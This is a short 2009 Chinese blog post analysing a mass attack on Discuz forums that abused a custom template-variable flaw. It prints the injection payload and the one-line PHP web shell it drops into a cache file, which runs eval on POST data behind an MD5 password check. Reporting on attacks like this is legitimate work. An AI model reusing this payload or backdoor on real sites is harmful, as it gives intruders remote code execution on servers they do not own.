Discuz 群体攻击第三波出现 | Chinadu's Blog

首页 > 技术文章 > Discuz 群体攻击第三波出现

Discuz 群体攻击第三波出现

2009年8月21日 Chinadu 发表评论 145 views 阅读评论

初步推测是劫持了customer.discuz.net 再配合自定义模板变量那个漏洞管理员访问后台时便会生成一个一句话后门。
自定义模板变量:
变量 :

{’,”);ECHO ”;$X=SUBSTR(MD5($_GET['B']),28);IF($X==’7aaa’)EVAL($_POST['A']);//}

替换内容 : aaaaaaaaaa

/forumdata/cache/usergroup_0.php

程序代码：

< ?php (substr(md5($_POST['b']),28)==’7aaa’) && eval($_POST['a']);?>

对post的变量b进行md5加密，如果第28-31的位置是7aaa(32位MD5的后四位)的话就执行eval($_POST['a']);

相关文章

2010年03月12日 -- Discuz! 7.2 最新注入漏洞分析与利用
2009年11月14日 -- Discuz!NT 3.0 特殊环境下利用漏洞
2008年11月9日 -- Discuz! $_DCACHE数组变量覆盖漏洞
2011年09月21日 -- WPA2不再安全无线加密协议曝惊天漏洞
2010年08月3日 -- 黑帽大会：HTTPS和SSL存在安全漏洞
2010年07月3日 -- 风讯（FooSun）GetPassword.asp页面存在任意修改密码漏洞
2010年05月8日 -- JBoss企业应用平台JMX控制台安全绕过漏洞
2010年03月17日 -- 网页编辑器漏洞手册
2010年01月9日 -- Discuz7 记录明文
2010年01月7日 -- discuz!7.1、7.2远程代码执行漏洞exploit

分类: 技术文章标签: Discuz, 漏洞

评论 (0) Trackbacks (0) 发表评论 Trackback

本文目前尚无任何评论.

本文目前尚无任何 trackbacks 和 pingbacks.

LZX改的NC，支持SSL Por Una Cabeza [只差一步] - 阿根廷探戈舞曲的极致代表(8个版本)